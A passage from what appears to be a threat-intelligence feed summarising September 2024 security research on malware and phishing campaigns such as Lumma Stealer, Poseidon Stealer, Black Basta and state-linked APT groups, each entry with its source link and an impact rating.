Summary:: Cloudsek researchers have identified a new method of distributing Lumma Stealer that targets Windows users through fake human verification pages. The technique tricks users into running malicious code via a fake Google CAPTCHA page. When users click on Verify then they are instructed to paste a command into the Run dialog box which executes a hidden PowerShell script that downloads the Lumma Stealer malware. Once the malware is installed, it connects to attacker-controlled domains to steal sensitive information.

Source: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages

Intel Source:: CERT-AGID

Intel Name:: Fake_GitHub_Security_Alert_Spreads_Lumma_Stealer

Date of Scan:: 2024-09-19

Impact:: LOW

Summary:: Researchers at CERT AGID have identified a phishing attack targeting GitHub users with a fake security warning titled “IMPORTANT! Security Vulnerability Detected in your Repository (Issue #1).” The email pretends to be from the GitHub Security Team and redirects users to a malicious website github-scanner[.]com. The site instructs them to press specific keys (Windows+R, Ctrl+V, Enter) that run malicious PowerShell code. This code installs Lumma Stealer malware which steals sensitive information like login credentials. If the malware can't connect to its C2 servers, it attempts to gather data from Steam profiles.

Source: https://cert-agid.gov.it/news/lumma-stealer-diffuso-tramite-notifica-di-falsa-vulnerabilita-di-sicurezza-sul-proprio-progetto-github/

Intel Source:: Esentire

Intel Name:: Poseidon_Stealer_Target_MacOS_through_Sopha_AI

Date of Scan:: 2024-09-19

Impact:: LOW

Summary:: ESentire researchers have discovered a malware called Poseidon Stealer that specifically targets macOS devices. The malware spreads through a fake Sora AI installer which is downloaded from a malicious website via Google Ads. It uses various techniques to conceal its activity such as running in the background even after the terminal window is closed. It gathers sensitive information including browser data, cryptocurrency wallets, Keychain details and documents. The malware also deceives users by displaying a fake system prompt to steal their macOS password. Poseidon Stealer transfer the stolen data to a C2 server using a curl command to avoid detection.

Source: https://www.esentire.com/blog/poseidon-stealer-uses-sopha-ai-lure-to-infect-macos

Intel Source:: Mandiant

Intel Name:: UNC1860_Target_Middle_East

Date of Scan:: 2024-09-19

Impact:: MEDIUM

Summary:: Mandiant researchers have identified UNC1860, an Iranian state-sponsored group linked to Iran's Ministry of Intelligence and Security (MOIS). This group is known for its advanced hacking tools and backdoors which allow them to maintain persistent access to networks particularly in the government and telecommunications sectors across the Middle East. Their toolkit includes custom controllers like TEMPLEPLAY and VIROGREEN which make it easier for external operators to deploy malware and manage infected systems. They possess strong reverse-engineering capabilities to manipulate Windows systems. The group has been observed scanning for vulnerabilities in Saudi Arabia, testing credentials in both Qatar and Saudi Arabia, and targeting VPN servers in the region.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/

Intel Source:: Palo Alto

Intel Name:: PondRAT_Malware_Targets_via_Python_Packages

Date of Scan:: 2024-09-19

Impact:: LOW

Summary:: Researchers at Palo Alto have identified a malicious Python package campaign known as "PondRAT," which delivered backdoors to Linux and macOS. This hack is attributed to the North Korean Gleaming Pisces APT group, which is uploading poisoned Python packages to the popular PyPI repository. PondRAT, an updated version of the previously known POOLRAT virus, targets developer endpoints in order to infect supply chain vendors and their customers.

Source: https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/

Intel Source:: Sekoia

Intel Name:: Unveiling_Emmenhtal_Malware_Delivery_System

Date of Scan:: 2024-09-19

Impact:: LOW

Summary:: Researchers at Sekoia have discovered the infrastructure that supports the Emmenhtal loader, also known as PeakLight, which has been operational since December 2023. This study highlights the loader's use of WebDAV technology to host harmful files and suggests that this infrastructure could be part of a commercial service provided by hackers.

Source: https://blog.sekoia.io/webdav-as-a-service-uncovering-the-infrastructure-behind-emmenhtal-loader-distribution/

Intel Source:: Qualys

Intel Name:: A_Deep_Dive_into_Black_Basta_Ransomware

Date of Scan:: 2024-09-19

Impact:: MEDIUM

Summary:: Researchers from Qualys have identified a ransomware group called Black Basta that operates as a Ransomware-as-a-Service (RaaS) and was first discovered in April 2022. The group uses a double extortion tactic for demanding payment not only to decrypt files but also to prevent the public release of stolen data. The group has been targeting a wide range of industries including critical infrastructure in North America, Europe and Australia. This group gain initial access through phishing, malicious software like Qakbot, Cobalt Strike or by exploiting vulnerabilities. They exfiltrate the sensitive data by using tools such as Rclone and WinSCP before deploying the ransomware.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/09/19/black-basta-ransomware-what-you-need-to-know#indicators-of-compromise

Intel Source:: CERT-AGID

Intel Name:: SPID_Banking_Phishing_Campaign

Date of Scan:: 2024-09-18

Impact:: LOW

Summary:: Researchers from CERT AGID have uncovered a phishing campaign targeting users of Italian banks by exploiting the SPID (Public Digital Identity System) service which is used for online authentication. The fraudulent website closely mimics the official SPID page to trick users into updating their credentials to renew their digital identity and maintain access to online services. When users click the link, they are asked to select their bank and verify their identity. After choosing their bank they are redirected to a fake login page designed to resemble the bank's official site.

Source: https://cert-agid.gov.it/news/in-atto-una-campagna-di-phishing-bancario-a-tema-spid/

Intel Source:: Cofense

Intel Name:: Threat_Actors_Using_HR_Related_Phishing_Tactics

Date of Scan:: 2024-09-18

Impact:: LOW

Summary:: Cofense researchers have discovered a phishing campaign in which attackers target employees by impersonating their company's HR department. The email appears official, with a subject line such as 'Important: Revised Employee Handbook' to create urgency and prompt employees to act quickly. It uses formal language and includes a link to review the handbook. This link leads to a fake Microsoft page that asks users to enter their company login details. After submission, users receive an error message and are redirected to the real login page, making it seem like a minor glitch. Meanwhile, the attackers have stolen their login credentials for further attacks or access sensitive company data.

Source: https://cofense.com/blog/threat-actors-continue-to-utilize-hr-related-phishing-tactics

Intel Source:: ASEC

Intel Name:: SuperShell_Malware_Targeting_Linux_SSH_Servers

Date of Scan:: 2024-09-18

Impact:: LOW

Summary:: ASEC researchers have discovered an attack in which the backdoor malware SuperShell was installed on a poorly managed Linux SSH server. This malware is developed by a Chinese-speaking developer in the Go language that acts as a reverse shell which allow attackers to control infected systems remotely. It targets multiple platforms, including Windows, Linux, and Android and is distributed through both web and FTP servers. In this attack, the attacker’s objective is to control the system and installation of a Monero cryptocurrency miner like XMRig.

Source: https://asec.ahnlab.com/ko/83121/

Intel Source:: Cyfirma

Intel Name:: Gomorrah_Stealer

Date of Scan:: 2024-09-18

Impact:: LOW

Summary:: Cyfirma researchers have uncovered a malware called Gomorrah Stealer that operates within a malware-as-a-service (MaaS) framework and targets sensitive data on compromised systems. The stealer's primary function is to extract and exfiltrate information such as passwords, credit card details and cookies from web browsers and other applications. Gomorrah Stealer is sold and supported through Telegram. It sends the stolen data to a C2 server by compressing it into a zip file and then deletes the local files to cover its tracks. The malware also receives updates and instructions from the C2 server to remain active.

Source: https://www.cyfirma.com/research/gomorrah-stealer-v5-1-an-in-depth-analysis-of-a-net-based-malware/

Intel Source:: Lumen

Intel Name:: The_Raptor_Train_Botnet

Date of Scan:: 2024-09-18

Impact:: MEDIUM

Summary:: Researchers from Black Lotus Labs have uncovered the massive botnet called Raptor Train that believed to be operated by Chinese threat actors known as Flax Typhoon. This botnet has been active for over four years and has compromised hundreds of thousands of devices like home routers, security cameras and storage servers. The threat actors use a custom-built system called Sparrow to control the network and target U.S. and Taiwanese organizations in sectors such as the military, higher education, telecommunications, government and IT. They have also attempted to exploit Atlassian Confluence servers and Ivanti Connect Secure appliances through this botnet. No DDoS attacks have been observed from the Raptor Train botnet yet, but it appears capable of such attacks in the future.

Source: https://blog.lumen.com/derailing-the-raptor-train/

Intel Source:: Elastic Security Labs

Intel Name:: Evolving_Python_Exploits_by_DPRK_Hackers

Date of Scan:: 2024-09-18

Impact:: LOW

Summary:: Researchers at Elastic Security Labs have discovered that the DPRK uses Python for advanced cyber intrusions. They prefer Python because of its ease of obfuscation and wide library support. DPRK techniques include sophisticated social engineering and long-term persona creation. Their Python scripts may run system commands and change local files, indicating the significance of continuous awareness and adaptation in cyber defense.

Source: https://www.elastic.co/security-labs/dprk-code-of-conduct

Intel Source:: Securelist

Intel Name:: SambaSpy_RAT_Unveiled_in_Italian_Cyberattack

Date of Scan:: 2024-09-18

Impact:: LOW

Summary:: Researchers at Securelist have discovered a cyberattack in May 2024 that particularly targeted Italian consumers, which is uncommon given that most operations target broader countries. The attackers used a new RAT, SambaSpy, as the final payload, leveraging a legitimate company's online document for spread with no connection to the organization.

Source: https://securelist.com/sambaspy-rat-targets-italian-users/113851/

Intel Source:: Jamf Threat Labs

Intel Name:: North_Korea_Targets_Crypto_with_Social_Scams

Date of Scan:: 2024-09-17

Impact:: LOW

Summary:: Researchers from Jamf Threat Labs have observed the targeted attacks that are consistent with previous FBI concerns regarding North Korean cyber operations. These attacks usually start with a social media strategy, such as someone posing as a recruiter on LinkedIn. On September 3, 2024, the FBI issued a warning that North Korea was employing social engineering to target persons in the cryptocurrency business with the goal of spreading malware.

Source: https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/

Intel Source:: CERT-AGID

Intel Name:: Vidar_Malware_Spread_Through_PEC_Mailbox_Attack

Date of Scan:: 2024-09-17

Impact:: LOW

Summary:: Researchers from CERT AGID have discovered a new malspam attack targeting PEC mailboxes, which was initially reported on September 16, 2024. Initially, the attack used a link to an Italian domain (Excite), which did not include any malicious payload. However, the attackers changed their tactic, employing the identical text but replacing the link with an active domain that drops a JavaScript file. This file eventually installs the Vidar malware, which has been identified for its ability to steal information.

Source: https://cert-agid.gov.it/news/vidar-compare-ancora-in-una-nuova-campagna-malspam-che-sfrutta-le-caselle-pec/

Intel Source:: Mandiant

Intel Name:: UNC2970_Backdoor

Date of Scan:: 2024-09-17

Impact:: MEDIUM

Summary:: Mandiant identified the UNC2970 cyber espionage group, linked to North Korea, using sophisticated tactics to deploy malware. UNC2970 targets individuals in U.S. critical infrastructure sectors by phishing with job openings, masquerading as recruiters for prominent companies. The group sends a password-protected ZIP archive containing an encrypted PDF file and a trojanized version of the SumatraPDF reader. This modified PDF viewer, not compromised but altered by UNC2970, is used to deliver the MISTPEN backdoor via the BURNBOOK launcher. Mandiant noted that UNC2970 customizes job descriptions to match the victim’s profile, aiming to extract sensitive information from high-level employees.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/

Intel Source:: RecordedFuture

Intel Name:: Marko_Polo_ThreatActor

Date of Scan:: 2024-09-17

Impact:: MEDIUM

Summary:: The "Marko Polo" cybercrime group represents a growing global threat with a sophisticated network of scams using infostealer malware. Targeting both individuals and businesses worldwide, Marko Polo deploys over 30 distinct scams by impersonating popular brands in online gaming, virtual meetings, and cryptocurrency platforms. They utilize advanced social engineering and spearphishing tactics, specifically targeting high-profile cryptocurrency influencers and online personalities. Their malware arsenal, including HijackLoader, Stealc, and AMOS, demonstrates their ability to adapt and scale operations across various platforms, affecting tens of thousands of devices globally and generating millions in illicit revenue.

Source: https://www.recordedfuture.com/research/marko-polo-navigates-uncharted-waters-with-infostealer-empire

Intel Source:: Unit42

Intel Name:: Snake_Keylogger_Activity

Date of Scan:: 2024-09-17

Impact:: MEDIUM

Summary:: Unit 42 researchers identified a new instance of the Snake KeyLogger malware, also known as "VIP KeyLogger," which is distributed via email. The infection begins with a phishing email, appearing as "NEW PO-09162024," containing a compressed archive attachment. When the victim extracts and runs the executable file, it installs the Snake KeyLogger, a .NET-based keylogger targeting Windows systems. This malware exfiltrates login credentials and cookie data from web browsers and Microsoft Outlook. The associated malicious files include a .gz archive and a .NET executable, with the malware communicating through various ports to exfiltrate data via email.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-09-16-IOCs-for-Snake-KeyLogger.txt

Intel Source:: Cyble

Intel Name:: Malware_Targeting_US_Taiwan_Defense_Industry

Date of Scan:: 2024-09-16

Impact:: LOW

Summary:: Cyble researchers have discovered a campaign targeted at those observing the following US-Taiwan Defense Industry Conference. This attacker employs a ZIP file containing a shortcut file (LNK) disguised as a legitimate PDF registration form. When this file is opened, commands are executed that store a fake PDF and malicious software in the startup folder in order to keep system control.

Source: https://cyble.com/blog/stealthy-fileless-attack-targets-attendees-of-us-taiwan-defense-industry-event/

Intel Source:: Palo Alto

Intel Name:: Phishing_Campaigns_Targeting_Financial_Sector

Date of Scan:: 2024-09-16

Impact:: LOW

Summary:: Palo Alto researchers have discovered large-scale phishing attacks in 2024 that leverage the HTTP refresh response header to automatically reroute victims to malicious websites. Between May and July, over 2,000 malicious URLs were found daily. These attacks primarily targeted the global financial industry, government websites, and major internet platforms.

Source: https://unit42.paloaltonetworks.com/rare-phishing-page-delivery-header-refresh/

Intel Source:: Malwarebytes

Intel Name:: PartnerLeak_Scam_Exploits_Trust_to_Steal_Data

Date of Scan:: 2024-09-13

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered a fraudulent activity in which users are misled into believing their partner is cheating. The fake email claims to have stolen sensitive information, such as contacts and browsing history, and provides "proof" via a website link. This website, partnerleak[.]com, was created anonymously on August 1, 2024. When users access the site, their email address is already filled in, indicating that it was obtained during the process.

Source: https://www.malwarebytes.com/blog/news/2024/09/partnerleak-scam-site-promises-victims-full-access-to-cheating-partners-stolen-data

Intel Source:: Bitdefender

Intel Name:: A_Growing_Cyber_Threat_of_Medusa_Ransomware

Date of Scan:: 2024-09-13

Impact:: MEDIUM

Summary:: The Bitdefender researchers have dived deep into Medusa ransomware and highlighted the increasing threat posed. It's a notable ransomware group that surfaced in 2023, and distinguishes itself with a significant presence on both the surface and dark web. In 2024, they maintain a high pace of cyberattacks, frequently updating their leaks and ransoms on platforms like a victim-shaming blog, X, and Telegram.

Source: https://www.bitdefender.com/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence/

Intel Source:: Cado Security

Intel Name:: Misuse_of_Selenium_Grid

Date of Scan:: 2024-09-13

Impact:: LOW

Summary:: Cado Security researchers have identified the increased misuse of Selenium Grid for malicious activities such as cryptomining and proxyjacking. Selenium Grid, a tool originally designed for automating web application testing, is being exploited by threat actors to harness the computational power of distributed systems for unauthorized cryptomining. Additionally, it is used to route traffic through compromised systems, effectively turning them into proxies for various criminal purposes.

Source: https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking

Intel Source:: Aqua Sec

Intel Name:: Weblogic_Servers_Hit_by_Hadooken_Cryptominer

Date of Scan:: 2024-09-13

Impact:: MEDIUM

Summary:: Researchers from Aqua have discovered a new Linux malware that targets WebLogic servers. When this malware, dubbed "Hadooken" (possibly inspired by Street Fighter's "surge fist" move), is executed, it installs Tsunami malware and then launches a cryptominer.

Source: https://www.aquasec.com/blog/hadooken-malware-targets-weblogic-applications/

Intel Source:: Cyble

Intel Name:: Critical_Apache_OFBiz_Vulnerability_Exploiting

Date of Scan:: 2024-09-13

Impact:: MEDIUM

Summary:: Researchers at Cyble have observed an active exploitation of CVE-2024-32113 on September 7, 2024, a critical path traversal vulnerability in Apache OFBiz. The vulnerability, which allows unauthorized command execution, was initially patched on May 8, 2024. However, on September 4, 2024, a bypass for CVE-2024-32113 emerged, reigniting concerns and increasing vulnerability exploitation. Attackers are using this exploit to compromise systems and deploy the Mirai botnet.

Source: https://cyble.com/blog/the-re-emergence-of-cve-2024-32113-how-cve-2024-45195-has-amplified-exploitation-risks/

Intel Source:: DomainTools

Intel Name:: Safeguarding_Retail_Campaigns_from_Online_Fraud

Date of Scan:: 2024-09-13

Impact:: LOW

Summary:: Researchers from DomainTools have analyzed the growing issue of domain fraud in retail-targeted campaigns. It highlights how brand impersonation and Ponzi schemes are increasingly leveraging fraudulent domains to deceive consumers and undermine legitimate businesses. They observed the tactics used by fraudsters, including creating fake websites that mimic reputable brands, and the negative impact these schemes can have on both consumers and companies.

Source: https://www.domaintools.com/resources/blog/retail-targeted-campaigns-domain-fraud-brand-impersonation-and-ponzi-schemes/

Intel Source:: Trend Micro

Intel Name:: Critical_RCE_Flaw_in_WhatsUp_Gold_Network_Software

Date of Scan:: 2024-09-12

Impact:: LOW

Summary:: Researchers at Trend Micro have discovered remote code execution attacks on WhatsUp Gold since August 30 using the Active Monitor PowerShell Script. These attacks may have used vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16, while actual exploitation may have begun on the same day, shortly after a proof of concept was published on August 30.

Source: https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html

Intel Source:: Cisco Talos

Intel Name:: DragonRank_Attack_Using_PlugX_and_BadIIS_Malware

Date of Scan:: 2024-09-12

Impact:: LOW

Summary:: Researchers from Cisco have found a new threat known as "DragonRank," which mainly targets Asian and European countries by abusing web application services for search engine optimization (SEO) rank manipulation. DragonRank uses a web shell to acquire system information and launch malware like PlugX and BadIIS, which capture passwords. To prevent detection, the PlugX malware makes advantage of sideloading mechanisms and Windows Structured Exception Handling (SEH).

Source: https://blog.talosintelligence.com/dragon-rank-seo-poisoning/

Intel Source:: EclecticIQ

Intel Name:: SCATTERED_SPIDER_Targets_Cloud_with_Ransomware

Date of Scan:: 2024-09-12

Impact:: LOW

Summary:: Researchers from EclecticIQ reveals that the SCATTERED SPIDER gang targets cloud infrastructures in the insurance and banking sectors with phishing techniques such as vishing and smishing. They use stolen credentials, SIM swaps, and cloud-native technologies to gain permanent access, making identification difficult. Their knowledge with Western business practices led to an association with the BlackCat/ALPHV ransomware organization, which increased their efficiency.

Source: https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries

Intel Source:: Intezer

Intel Name:: Uncovering_The_Unique_YASS_Infostealer

Date of Scan:: 2024-09-11

Impact:: LOW

Summary:: Intezer researchers have recently identified a new infostealer while looking at a suspicious file. Despite being identical to a known malware named CryptBot, this new version varied sufficiently to be assigned a different threat. They called it "Yet Another Silly Stealer" (YASS). The malware was distributed using a multi-stage downloader known as MustardSandwich.

Source: https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/

Intel Source:: Sekoia

Intel Name:: Sekoia_Hunts_Malicious_Domains_for_Paris_Olympics

Date of Scan:: 2024-09-11

Impact:: LOW

Summary:: Researchers at Sekoia have discovered several fake domains that mimicked the official Paris 2024 Olympics websites in July and August 2024. Cybercriminals constructed these domains to carry out phishing attacks and other criminal activities. Previously, in January 2024, Sekoia stated that major events like the Olympics are prime targets for online scams such as fake ticket sales and phishing.

Source: https://blog.sekoia.io/securing-gold-hunting-typosquatted-domains-during-the-olympics/

Intel Source:: Zscaler

Intel Name:: Typosquatting_and_Brand_Impersonation_in_Phishing

Date of Scan:: 2024-09-11

Impact:: LOW

Summary:: Reseachers from Zscaler have found that phishing campaigns in 2024 focused mainly on typosquatting and brand impersonation methods. From February to July, they examined more than 30,000 lookalike domains and identified 10,000 as malicious. Google, Microsoft, and Amazon were the most popular targets, with roughly 75% of phishing sites copying these firms. Almost half of the malicious domains used Let's Encrypt TLS certificates to establish reliability, with.com being the most popular domain for English speakers.

Source: https://www.zscaler.com/blogs/security-research/phishing-typosquatting-and-brand-impersonation-trends-and-tactics

Intel Source:: Emanuele De Lucia

Intel Name:: Tracking_Ransomware_Through_Code_Similarities

Date of Scan:: 2024-09-11

Impact:: LOW

Summary:: Emanuele De Lucia have discussed a method by which the ransomware groups can be tracked by examining the similarities in the code of the malware. This looks into how the study of common code can link various samples of ransomware assisting the researchers to track the activities of different hacking groups.

Source: https://www.emanueledelucia.net/malwares-shared-secrets-code-similarity-insights-for-ransomware-gangs-activities-tracking/

Intel Source:: Cyble

Intel Name:: Phishing_Site_Mimics_CapCut_to_Distribute_Malware

Date of Scan:: 2024-09-11

Impact:: LOW

Summary:: Cyble researchers have discovered a phishing site posing as a CapCut download page. This site is designed for making users download the malicious software. The attackers have leveraged a reputation-hijacking technique by embedding a legitimate CapCut-signed application within the malicious download, exploiting the credibility of well-known apps to evade security measures.

Source: https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/

Intel Source:: Check Point

Intel Name:: Iranian_Attacks_Against_Government_Infrastructure

Date of Scan:: 2024-09-11

Impact:: MEDIUM

Summary:: Check Point Research has uncovered a targeted cyberattack against Iraqi government infrastructure involving new malware strains named Veaty and Spearal. These sophisticated tools employ advanced techniques such as DNS tunneling and command-and-control communication via compromised email accounts, using passive IIS backdoors and custom protocols. The malware shows strong ties to previously identified APT34 malware families like Karkoff, Saitama, and IIS Group 2, suggesting involvement by Iranian threat actors affiliated with the Ministry of Intelligence and Security (MOIS).

Source: https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/

Intel Source:: Palo Alto

Intel Name:: Rising_Threat_from_Repellent_Scorpius_Ransomware

Date of Scan:: 2024-09-10

Impact:: LOW

Summary:: Palo Alto researchers have identified Repellent Scorpius as a new ransomware gang that provides ransomware-as-a-service (RaaS) and distributes Cicada3301, which was first discovered in May 2024. This gang deploys several extortion methods. The Unit 42 report describes the ransomware in detail and provides insights into the group's methods and previous involvement in data theft.

Source: https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomware/

Intel Source:: Palo Alto

Intel Name:: Revealing_North_Korean_Cyber_Groups

Date of Scan:: 2024-09-10

Impact:: MEDIUM

Summary:: Researchers from Palo Alto Networks have discovered multiple North Korean threat groups, collectively known as Lazarus. These groups report to North Korea's Reconnaissance General Bureau (RGB). The researchers divided them into six distinct sub-groups: Bluenoroff, Citrine Sleet, Andariel, TEMP.Hermit, TraderTraitor, and Kimsuky, each of which used unique malware for particular attack operations. These groups create specialized malware for all major operating systems, including Windows, macOS, and Linux.

Source: https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/

Intel Source:: Sekoia

Intel Name:: Quad7_Update

Date of Scan:: 2024-09-10

Impact:: MEDIUM

Summary:: The Sekoia TDR team has uncovered new developments in the activities of the Quad7 botnet operators, revealing the use of compromised routers and VPN appliances, including brands like TP-Link, Zyxel, and Asus. Exploiting both known and previously unknown vulnerabilities, the operators have been evolving their toolset, introducing new backdoors and exploring advanced communication protocols like KCP. These changes indicate efforts to enhance stealth and evade detection, potentially making future tracking of Quad7's botnets difficult without interception capabilities.

Source: https://blog.sekoia.io/a-glimpse-into-the-quad7-operators-next-moves-and-associated-botnets/

Intel Source:: EclecticIQ

Intel Name:: Scattered_Spider_Update

Date of Scan:: 2024-09-10

Impact:: MEDIUM

Summary:: EclecticIQ analysts have shared updates on SCATTERED SPIDER, a sophisticated cybercriminal group, as a key threat targeting cloud infrastructures in the insurance and financial sectors. Using social engineering tactics such as phishing, smishing, and SIM swapping, the group exploits cloud platforms and identity administrators to gain unauthorized access to high-privileged accounts. SCATTERED SPIDER is known for purchasing stolen credentials and leveraging cloud-native tools to maintain persistence while avoiding detection. Their collaboration with ransomware groups like BlackCat/ALPHV has amplified their impact, making them a significant threat to Western organizations by infiltrating and exploiting cloud environments.

Source: https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries

Intel Source:: Malwarebytes

Intel Name:: RansomHub_Uses_TDSSKiller_and_LaZagne_in_New_Attack

Date of Scan:: 2024-09-10

Impact:: LOW

Summary:: Malwarebytes researchers have identified a new attack by the RansomHub ransomware group. This attack involves two tools: TDSSKiller, which disables security systems (EDR), and LaZagne, which collects credentials. While these tools have been available for years, this is the first time RansomHub has been detected leveraging them.

Source: https://www.threatdown.com/blog/new-ransomhub-attack-uses-tdskiller-and-lazagne-disables-edr/

Intel Source:: ESET

Intel Name:: ScRansom_Ransomware_And_CosmicBeetle_Updates

Date of Scan:: 2024-09-10

Impact:: LOW

Summary:: According to ESET researchers, the CosmicBeetle group is now deploying ScRansom, a new ransomware that replaces its older Scarab version. They mostly target small and medium-sized enterprises all across the world, taking advantage of outdated security vulnerabilities. CosmicBeetle has also experimented with the LockBit constructor to appear more credible. ESET researchers believe CosmicBeetle is tied to RansomHub, a ransomware gang that has been operating since March 2024.

Source: https://www.welivesecurity.com/en/eset-research/cosmicbeetle-steps-up-probation-period-ransomhub/

Intel Source:: Securelist

Intel Name:: Loki_Private_Agent_for_Mythic_Framework

Date of Scan:: 2024-09-09

Impact:: MEDIUM

Summary:: Researchers from Securelist have discovered Loki, a new tool for the Mythic framework. It is based on another tool, Havoc. Loki utilizes similar techniques to mask itself, such as encrypting its memory and performing indirect system calls. However, unlike Havoc, Loki is divided into two parts: a loader and a DLL file, which contains the majority of the dangerous functions.

Source: https://securelist.com/loki-agent-for-mythic/113596/

Intel Source:: Palo Alto

Intel Name:: Stately_Taurus_Targets_Government_Entities

Date of Scan:: 2024-09-09

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have discovered that the Chinese APT group Stately Taurus is using Visual Studio Code to conduct cyberespionage activities against Southeast Asian government agencies. They infiltrated networks using the software's integrated reverse shell feature, which is the first time this technology has been deployed in a real-world attack.

Source: https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Intel Source:: Cyfirma

Intel Name:: BLX_Stealer

Date of Scan:: 2024-09-09

Impact:: LOW

Summary:: Cyfirma researchers have identified a malware called BLX Stealer also known as XLABB Stealer which has a capability to steal sensitive information such as login credentials, browser data, cryptocurrency wallets and gaming platforms like Steam and Riot Games from compromised systems. It is being advertised on platforms like Telegram and Discord with both free and premium versions available. The malware establishes persistence by placing itself in the system’s startup folder to ensure that it runs every time the computer is restarted. It also uses Discord's Webhook to send stolen data back to attackers.

Source: https://www.cyfirma.com/research/blx-stealer/

Intel Source:: Trend Micro

Intel Name:: Earth_Preta_Upgrades_Malware_Tactics

Date of Scan:: 2024-09-09

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have observed that Earth Preta, a sophisticated threat group targeting the Asia-Pacific (APAC) region, has recently upgraded its attack strategies. Their enhanced tactics include the deployment of PUBLOAD via the HIUPAN worm and using tools like FDMTP and PTSOCKET to expand control and data exfiltration. These campaigns often feature spear-phishing emails with multi-stage downloaders such as DOWNBAIT and PULLBAIT, leading to further malware installations. The attacks are highly targeted, time-sensitive, and focused on specific countries and sectors within APAC, particularly government entities.

Source: https://www.trendmicro.com/en_no/research/24/i/earth-preta-new-malware-and-strategies.html

Intel Source:: Hunt.IO

Intel Name:: ToneShell_Backdoor

Date of Scan:: 2024-09-09

Impact:: LOW

Summary:: Researchers at Hunt.IO have identified the malware dubbed ToneShell Backdoor which is linked to cyber espionage group Mustang Panda has recently remerged and targeting attendees of the 2024 International Institute for Strategic Studies (IISS) Defence Summit in Prague. The primary target of this campaign is to infiltrate sensitive discussions on military strategy, defense cooperation and geopolitical tensions. This malware often uses against government organizations in Southeast and East Asia for cyber espionage.

Source: https://hunt.io/blog/toneshell-backdoor-used-to-target-attendees-of-the-iiss-defence-summit

Intel Source:: Recorded Future

Intel Name:: Exposing_New_Predator_Spyware_Infrastructure

Date of Scan:: 2024-09-06

Impact:: LOW

Summary:: Researchers from Insikt Group have discovered new infrastructure and domains associated with Predator malware, which were most likely used during setup and exploitation. This discovery was based on network data, Recorded Future Network Intelligence, and other signs. The operators have added an extra layer to their multi-tiered distribution system to better user privacy while also improving the security of their server settings and associated domains.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0905.pdf

Intel Source:: Trend Micro

Intel Name:: TIDRONE_Threat_Cluster_Targets_Drone_Industry

Date of Scan:: 2024-09-06

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered that an unidentified threat cluster, known as TIDRONE, expressed a strong interest in military-related companies, particularly drone makers. TIDRONE, which is linked to Chinese-speaking groups, has attacked Taiwan's drone manufacturing business. This threat actor uses enterprise resource planning (ERP) software and remote desktop systems to spread sophisticated malware toolsets such as CXCLNT and CLNTEND.

Source: https://www.trendmicro.com/en_us/research/24/i/tidrone-targets-military-and-satellite-industries-in-taiwan.html

Intel Source:: Splunk

Intel Name:: ShrinkLocker_Malware

Date of Scan:: 2024-09-06

Impact:: MEDIUM

Summary:: Splunk researchers have identified a new strain of ransomware called ShrinkLocker that exploits BitLocker, a legitimate Windows feature to encrypt data. ShrinkLocker creates a secure boot partition to lock users out of their data unless a ransom is paid. The malware begins by identifying the operating system, deletes specific files and check the domain name to ensure it is targeting the correct system. It generates an encryption key based on the system's configuration and sends it to a C2 server using a temporary Cloudflare domain and deletes system logs, firewall rules and scheduled tasks to make detection and recovery more difficult.

Source: https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html

Intel Source:: Malwarebytes

Intel Name:: Fake_Google_Ads_Target_Lowes_Employee_Logins

Date of Scan:: 2024-09-06

Impact:: LOW

Summary:: Researchers from Malwarebytes have discovered the phishing attempts targeting Lowe's employees using bogus Google advertising. Lowe's has an employee site called MyLowesLife, where employees may view schedules, payments, and advantages. When employees searched for "myloweslife," some came across fake ads that led to fake websites. The attackers intended to obtain login information from current and past Lowe's employees, and they have apparently attacked other companies in similar methods.

Source: https://www.malwarebytes.com/blog/news/2024/09/lowes-employees-phished-via-google-ads

Intel Source:: ASEC

Intel Name:: Phishing_Emails_Impersonating_Netflix

Date of Scan:: 2024-09-06

Impact:: LOW

Summary:: ASEC researchers have discovered phishing emails impersonating Netflix are being distributed to trick users into updating their payment information. The email that claims there is a payment failure on the subscription and urges the recipient to click a link to resolve the issue. The email address used by threat actor “netflix-team[.]com” that seems legitimate and most of the links in the email like Help Center and Contact lead to Netflix's official website but “Update account now” button takes users to a phishing site. The scammer takes advantage of Netflix’s popularity to deceive users into sharing their personal information.

Source: https://asec.ahnlab.com/en/82969/

Intel Source:: Sophos

Intel Name:: Atomic_macOS_Stealer

Date of Scan:: 2024-09-06

Impact:: LOW

Summary:: Sophos researchers have uncovered Atomic macOS stealer (AMOS) that designed to steal sensitive information such as cookies, passwords, autofill data, and cryptocurrency wallet contents from infected macOS computers. It first appeared in April 2023. The Stolen data like Apple keychain data and macOS passwords is often sold on underground forums. It spread through malvertising and SEO poisoning where threat actors manipulate search engine rankings to promote malicious websites. Attackers have even hosted AMOS malware on GitHub and some of its control panels which are protected with login credentials.

